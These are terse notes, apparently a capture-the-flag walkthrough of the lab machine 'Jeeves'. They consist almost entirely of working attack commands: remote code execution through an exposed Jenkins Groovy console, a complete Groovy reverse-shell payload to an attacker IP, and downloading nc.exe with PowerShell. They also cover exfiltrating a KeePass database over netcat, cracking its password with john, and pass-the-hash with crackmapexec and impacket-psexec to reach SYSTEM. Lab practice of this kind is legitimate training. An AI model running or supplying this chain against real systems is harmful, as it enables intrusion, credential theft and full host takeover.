Jeeves  10.10.10.63
ttl 127 >> Windows

[+]Enumeration
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Ask Jeeves
135/tcp   open  msrpc        Microsoft Windows RPC
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open  http         Jetty 9.4.z-SNAPSHOT
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
|_http-title: Error 404 Not Found
Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2022-06-20T23:15:43
|_  start_date: 2022-06-20T23:01:58
|_clock-skew: mean: 3h00m01s, deviation: 0s, median: 3h00m00s
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)


[+]Version
Microsoft SQL Server 2005 - 9.00.4053.00 x86 Intel
Microsoft .Net Framework 2.050727.4223

http://10.10.10.63:50000/
Powered by Jetty:// 9.4.z-SNAPSHOT

[+]Jenkins Groovy Script Console

   1   │ http://10.10.10.63:50000/askjeeves/
   2   │ http://10.10.10.63:50000/askjeeves/computer/(master)/script >> Console Groovy Script


[+]Rce
def cmd = "cmd.exe /c dir".execute();
println("${cmd.text}");

[+]Revershell
String host="10.10.10.10";
int port=4444;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

sudo nc -lvnp 4444
C:\Users\Administrator\.jenkins>whoami  
jeeves\kohsuke

[+]user.txt

[+]Priviliage Escalation
C:\Users\kohsuke\Documents>dir
CEH.kdbx >> Kepass Passwords

locate nc.exe >> /usr/share/sqlninja/apps
sudo python3 -m http.server 80 
C:\Users\kohsuke\Documents> powershell -c iwr 10.10.14.42:80/nc.exe -o nc.exe


C:\Users\kohsuke\Documents> nc.exe -w 3 10.10.14.42 1234 < CEH.kdbx
sudo nc -lvp 1234 > CEH.kdbx

keepass2john CEH.kdbx > kdbx.hash
john -w /usr/share/wordlist/rockyou.txt hash
> moonshine1

keepassxc CEH.kdbx
moonshine1

Backup Staff
e0fb1fb85756c24235ff238cbe81fe00

crackmapexec smb 10.10.10.63 -u 'Administrator' -H 'e0fb1fb85756c24235ff238cbe81fe00' 
[+]Pwned

impacket-psexec WORKGROUP/Administrator@10.10.10.63 -hashes :e0fb1fb85756c24235ff238cbe81fe00

C:\Windows\system32>whoami
nt authority\system


C:\Users\Administrator\Desktop>type hm.txt
The flag is elsewhere.  Look deeper.

C:\Users\Administrator\Desktop>dir /r /s
hm.txt:root.txt:$DATA

C:\Users\Administrator\Desktop>more < hm.txt:root.txt
afbc5bd4b615a60648cec41c6ac92530




